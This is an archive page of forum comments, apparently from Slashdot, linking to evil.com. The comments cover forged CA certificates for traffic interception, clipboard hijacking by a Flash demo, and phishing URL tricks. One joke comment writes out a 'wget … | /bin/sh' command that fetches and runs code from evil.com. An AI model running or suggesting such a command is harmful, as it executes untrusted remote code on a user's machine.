Domain: evil.com
Stories and comments across the archive that link to evil.com.
Comments · 13
-
Re:It means they found a back door...
What possible use would having the boss of Verisign in their back pocket be?
Verisign fulfills a 'trust provider' function by signing people's website certificates. The only use for that would be to have a clean certificate for, say, a typosquatting site.
If you had control of a CA's key — and I think it should be treated as obvious that the NSA could get one — you could write fake certificates. So say someone goes to https://evil.com/ and the government wants to spy. They can order the ISP to secretly log all the traffic, but it's worthless: the traffic is encrypted. You could provide a fake certificate, but then scary warnings would go up about domain name mismatches or whatever. But if you have a recognized CA's key, you can make your own legitimate-looking certificate. Then just route all the traffic through your proxy, which uses the forged certificate's private key to act as an HTTPS server to the suspected miscreant, and the real certificate's public key to act as an HTTPS client to the real site.
Basically, SSL relies on the trustworthiness of certificate authorities. If you can forge a certificate, it's mostly worthless. All you need is one CA's key, and there are zillions of the buggers based in the US, so I really doubt the US government would have a hard time getting one if it cared.
-
Re:What is a continental hotel?
Just enter all your data in to this form: http://www.evil.com/ and we'll check if yours was present in the stolen list.
-
even better on ubuntu
closing the tab in firefox 3.0.1 on Ubuntu 8.04 works for me.
On Ubuntu (and presumably other X11-based systems), the "middle-click clipboard" (which is what I use 90% of the time) is completely unaffected. Only the annoying ^X/^C clipboard, which I almost never use, is affected. I cut-and-pasted the above quote even though ^V currently gives me: http://www.evil.com./
I could probably be hit with the real version of this thing and not notice for upwards of a week.
:)(I'll bet money that there's no rebooting required to clean this out either. At the very worst, restarting the X server should be more than adequate.)
-
Re:Hard to remove?
I went to the demo site and the url http://evil.com/ appeared in klipper, I cleared the clipboard and the url http://evil.com/ was gone, I went back to the demo site and the url http://evil.com/ was back in the clipboard, so the flash definitely opened the clipboard in Firefox running in Lunux under the KDE 4.0.1 environment; it weirded me out too, I'm not used to things like that happening in Linux.
-
Re:Hard to remove?
I went to the demo site and the url http://evil.com/ appeared in klipper, I cleared the clipboard and the url http://evil.com/ was gone, I went back to the demo site and the url http://evil.com/ was back in the clipboard, so the flash definitely opened the clipboard in Firefox running in Lunux under the KDE 4.0.1 environment; it weirded me out too, I'm not used to things like that happening in Linux.
-
Re:Hard to remove?
I went to the demo site and the url http://evil.com/ appeared in klipper, I cleared the clipboard and the url http://evil.com/ was gone, I went back to the demo site and the url http://evil.com/ was back in the clipboard, so the flash definitely opened the clipboard in Firefox running in Lunux under the KDE 4.0.1 environment; it weirded me out too, I'm not used to things like that happening in Linux.
-
Re:Hard to remove?
what happens is the clipboard is loaded with the url http://www.evil.com/ at the demo site; I'm using Firefox 3.0.1 un Lunux so this is pretty disconcerting to me. The Wife ran into the real deal hijack over on myYearbook,com; she thought she'd be smart and click cancel but that started to loading of the malware!
-
Re:Thunderbird, Mozilla Mail's Worst Misfeature
My bank doesn't call me either, they send letters. My point was just that phishing cons can be launched without HTML email.
I'm not aware of any email clients released in the past 4 years that automatically opened external links in email messages, and I wouldn't use one because of just that issue. The web bug problem is a huge issue not just for phishers but for spammers in general.
And if we banned HTML email, then the phishers would just switch to text-only email. People will still click on http://www.yourbank.com.evil.com/default.htm because they think it's the bank. It's not hard to obscure a URL such that people will click on it. -
Re:Not irresponsible disclosure
In that case, I have a critical vulnerability in wget. If I, Umm, "accidentally" type wget -O- http://evil.com/ |
/bin/sh, they can execute arbitrary code. PLZ2FIXKTHX. -
Re:Microsoft Recommends..Remember the massive bundle of critical OS X security updates a week ago which patched holes that were being exploited for months?
- "Who cares about these critical vulnerabilities, as long as there's no spyware?"
- "Microsoft probably fixes loads of security bugs that they don't tell anyone about"
- "The remote/web vulnerabilities can't do any damage because users don't run as admin!"
- "The local admin privilege escalation vulnerabilities don't matter, because they're just local!"
- > (tagging beta)
Then Microsoft lets everyone know the moment an 0-day vulnerability is released which exploits a bug in Word.
- "I'd like to kick MS in the balls"
- "Why can't MS learn from Apple?"
- "It's lucky we use Macs where I work"
- "Read what Linus wrote about this vulnerability here: linus.doc"
- > haha, pwned, roflolmao (tagging beta)
Some people here make Slashdot seem like a parody of itself.. -
Not even paying for 1st choice!
It was their 2nd choice...
http://evil.com/ was already taken, so they thought laterally!
Make that 3rd, http://vile.com/ is taken too... -
Re:Talk about flame-bait lead-insI agree. Perhaps the post should have continued
"...or will Aschroft shoot for a trial in Virignia, hoping for the death penalty. Will this ultimately lead to an Orwellian 1984 type future? I don't know about you, but I'm joining Amnesty International right now."
-
Your Email Idea Won't Work
Sending a link in an email isn't as straightforward as you make out - it would require the recipients to have Unicode enabled mail readers for them to see the link as it really is.
At the moment, this is only really supported in HTML (and even then the support is patchy).
If you are going to send out HTML, there is no real need for that level of sophistication - a link like:
http://www.microsoft.com
will fool enough people.
This is potentially more of a problem in the future for those who use large character sets regularly, and therefore support Unicode natively on their platform in things like MUAs.